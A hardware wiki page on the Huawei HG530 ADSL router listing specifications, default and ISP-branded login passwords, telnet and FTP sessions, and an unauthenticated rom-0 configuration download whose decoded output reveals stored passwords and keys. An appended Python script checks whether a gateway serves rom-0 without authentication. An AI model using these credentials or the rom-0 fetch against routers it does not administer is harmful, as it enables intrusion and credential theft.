Huawei HG530

From WikiDevi.Wi-Cat.RU

Huawei HG530

Country of manuf.: China

Type: wireless router, dsl modem

FCC ID: QISHG530

Power: 12 VDC, 0.5 A
Connector type: barrel

CPU1: TrendChip TC3162U
FLA1: 2 MiB (Macronix MX25L1606E)
RAM1: 8 MiB (EtronTech EM638165TS-6G)

Expansion IFs: none specified

WI1 chip1: Ralink RT3390
WI1 802dot11 protocols: bgn
WI1 MIMO config: 1x1:1
WI1 antenna connector: U.FL

ETH chip1: TrendChip TC3162U
Switch: TrendChip TC2206F
LAN speed: 100M
LAN ports: 4

Additional chips
DSL (ADSL2+) AFE: TrendChip TC3086 (markings: TRENDCHIP, TC3086-QFN64-EPG, C2W49800, TP1130B5), quantity: 1

Stock FW OS: ZyNOS

Flags: ADSL2+

Default IP address: 192.168.1.1
the IP 192.168.1.1 is used by 1297 additional devices
of which 16 are Huawei devices
Default login user: admin
Default login password: admin
admin:admin credentials used by 1321 additional devices
of which 15 are Huawei devices

802dot11 OUI: AC:E8:7B
Ethernet OUI: AC:E8:7B

For a list of all currently documented Ralink chipsets with specifications, see Ralink.
For a list of all currently documented TrendChip chipsets with specifications, see TrendChip.


Huawei HG530 - Wireless ADSL Modem Router

The router is labeled: "bg Wi-Fi certified, with some n features". It is a draft-n router, compatible with the 802.11n standard.

Same chipset as ZyXEL P-660HN-TxA (T1A, T3A), Billion BiPAC 5200W (Manual), and D-Link DSL-2680 rev A1 (2 LAN ports only).

Additional external links

Manuals

Product Description
User Guide
User Guide
User Guide (Spanish)

Firmware

Telmex branded firmware
Telnor firmware
ColombiaTel firmware
ETB firmware (zip archive, not rar!)

Components

MX25L1606E datasheet
EM638165TS datasheet

Command Line

(A selection of guides for ZyXEL devices, as no matching Huawei CLI guide was found.)
Prestige 334w CI Command List
CLI Reference Guide Version 3.70
CLI Reference Guide Versions: 3.79, 3.80, 3.90, 4.00
ZyNOS CI and BootBase Commands (ZyNOS 1999)
Using the console port

Router login

The HG530 supports 3 different user names; login is possible by using the following protocols.

  • Web interface: http
  • Console login: telnet
  • File transfer: ftp

Default login user & password

The HG530 was often distributed as a custom-branded version by ISPs such as Telmex or Claro
(both ISPs in the Latin America region) with non-standard login user/password combinations.

The pictures below show a Claro branded router with admin defaults found here (tested),
while defaults for user2 and user3 were extracted from rom-0 backup file (tested):

 • login user & password
  • login user1: admin
  • login password1: Tu64$TEL
  • login user2: usuario
  • login password2: Turbonett
  • login user3: user
  • login password3: Turbonett

Claro Dominican Republic instructions suggest (untested):

  • login user: (MAC address as on label)
  • login password: (MAC address as on label)

Telmex branded router according to firmware update instructions (untested):

  • login user: Telmex
  • login password: (WEP key from label on backside)

Other likely user/password combinations as found here and here (untested):

  • login user: admin
  • login password: d3c0ntr0l

or

  • login user: admin
  • login password: CEP#(plus last 6 digits of serial number)
    e.g. serial number: 89546123011578, password: CEP#011578

Telnet

Opens a session with the ZyNOS CI. All users (admin, user) have full privileges!

 • telnet
$ telnet 192.168.1.1
Trying 192.168.1.1...
Connected to 192.168.1.1.
Escape character is '^]'.

Username: admin

Password: ********
Copyright (c) 2001 - 2011 Huawei

HG530> help
Valid commands are:
sys             exit            ether           wan               
etherdbg        tcephydbg       ip              bridge            
dot1q           pktqos          show            set               
lan

HG530> sys
modfTTL         edit            feature         hostname          
log             resetlog        stdio           syslog            
version         view            wdog            romreset          
factoryreset    atssid          atwpakey        atwepkey          
acl             keytest         atsh            diag              
routeip         bridge          save            display           
password        default         batchnumber     versionstyle      
versionM        multiuser       password2nd     username2nd       
deleteUser      getusername2nd  password3rd     username3rd       
delete3rdUser   getusername3rd  adminname       modelcheck        
attainrateflag  pswauthen       setser          resetbtntime      
setdefaultlanip fwuptimeout     sptromsize      syncinterval      
tcpdebug        cwmp            socket          filter            
cpu
 • sys version
HG530> sys version

 RAS version: V100R001C10B023 SALVADOR
 RAS version(web): V100R001B023 SALVADOR 2011/04/27 
 System   ID: $5.1.54.0(RUE0.C2)3.12.8.20     20110407_V001  [Apr 07 2011 15:06:42]
 romRasSize: 1357172 
 system up time:     2:03:49 (b5601 ticks)
 bootbase version: VTC_SPI1.11 | 2011/03/11

HG530> sys atsh

RAS version            : V100R001B023 SALVADOR
romRasSize             : 1363726
bootbase version       : VTC_SPI1.13 | 2011/10/13
Product Model          : Home Gateway
MAC Address            : ACE87B008C88
Default Country Code   : FF
Boot Module Debug Flag : 00
RomFile Version        : 01
RomFile Checksum       : d396
RAS F/W Checksum       : 5685
SNMP MIB level & OID   : 050000000100000002000000030000000400000005
Main Feature Bits      : 86
Other Feature Bits     :
93 17 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 13 00 00 00

HG530> sys getusername2nd
secondUserName: usuario
HG530> sys getusername3rd
thirdUserName: user

FTP

Gives write-only access to the firmware, and read/write access to the rom-0 backup file.

Only the user admin is allowed to log in!
 • ftp
$ ftp 192.168.1.1
Connected to 192.168.1.1.
220 HG530 FTP version 1.0 ready at Sat Jan 01 05:50:34 2000
Name (192.168.1.1:john): admin
331 Enter PASS command
Password:
230 Logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 Port command okay
150 Opening data connection for LIST 
--w--w--w-   1 owner    group         1363726 Jul 01 12:00 ras
-rw-rw-rw-   1 owner    group          131072 Jul 01 12:00 rom-0
?226 File sent OK

$ ftp 192.168.1.1
Connected to 192.168.1.1.
220 HG530 FTP version 1.0 ready at Sat Jan 01 02:08:30 2000
Name (192.168.1.1:john): user
530 User user cannot log in.
Login failed.

Vulnerabilities

rom-0

Like many other ZyNOS-based devices, the HG530 allows the configuration backup file rom-0 to be downloaded without any authentication.

http://192.168.1.1/rom-0

The rom-0 file is LZS compressed (see reverse engineering the zyxel configuration backup file and static analysis).

The Java-based rom-0 decoder from GitHub reveals the login passwords, SSID and WEP key in clear text.
$ java -jar rom0.jar rom-0
.l.password.HG530.u.public.a.dhcpp.192.43.244.18.P.E.5.user.Turbonett.@.l.password.HG530.u.public.l.password.HG530.u.`.L.2`ISP-0.{. .turbonett.RN.}.d.-.@.@.L.0. .d.B.RN.w`.{.0.@.0.@.$.L.Q.'P.dhcppc.}.d.+.*.HG520.d. .$.(.0.SUA.8.P.Z.d. .$.A.^.>._=. .H. TURBONETT_008C88.d.+.*.74E75C4CDB.3.".%.@!.dd.d.RT3390_2.A.^.>._=.3. .H. TURBONETT_008C88.d.+.*.4.4.vlan14.5.C!.(.(.1`.W$h.(.(.1`.W$h.$.@.@usuario.%.Q.{/tr069.H.wei Technologies Co., Ltd.HG530.00E0FC.HG530TRA.0.1-.T.:.Z.4.33_4.0.H.0.Wf.
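
To check whether a gateway you administer still serves rom-0 without authentication, the following script classifies the response to a credential-less GET of the URL above. It is an added example, not part of the original wiki page or of any Huawei/ZyXEL tooling. The 131072-byte size comes from the FTP listing on this page; the function names and verdict labels are assumptions of this example.

```python
import sys
import urllib.error
import urllib.request

ROM0_SIZE = 131072  # rom-0 size shown in the FTP listing on this page


def classify(status, body):
    """Map an unauthenticated GET /rom-0 response to a verdict string."""
    if status is None:
        return "unreachable"
    if status in (401, 403):
        return "protected"          # device demands credentials
    if status == 404:
        return "absent"
    if status != 200:
        return "inconclusive"
    head = body[:256].lstrip().lower()
    if head.startswith((b"<!doctype", b"<html")):
        return "login-page"         # 200 that is only the web UI, not the backup
    if len(body) == ROM0_SIZE:
        return "exposed"            # full configuration backup served to anyone
    return "review"                 # binary answer of another size: inspect by hand


def fetch_rom0(host, timeout=5.0):
    """GET http://<host>/rom-0 with no Authorization header or cookies."""
    req = urllib.request.Request(f"http://{host}/rom-0")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read(ROM0_SIZE + 1)
    except urllib.error.HTTPError as err:
        return err.code, b""
    except (urllib.error.URLError, OSError):
        return None, b""


def audit(host="192.168.1.1"):
    """Fetch and classify in one step; the default is the page's default IP."""
    return classify(*fetch_rom0(host))


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "192.168.1.1"
    verdict = audit(target)
    print(f"{target}: rom-0 is {verdict}")
    sys.exit(1 if verdict in ("exposed", "review") else 0)
```

An "exposed" verdict means every value stored in the backup, including the login passwords, SSID and WEP key shown in the decoder output above, should be treated as disclosed.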

TBD: Credential disclosure in modems Huawei HG510, HG520x, HG530 and possibly others [1] [2] [3] [4] [5]

Images

from User:Zerohero

P.S. Other pictures [6] [7] do show a 3rd on-board switching regulator.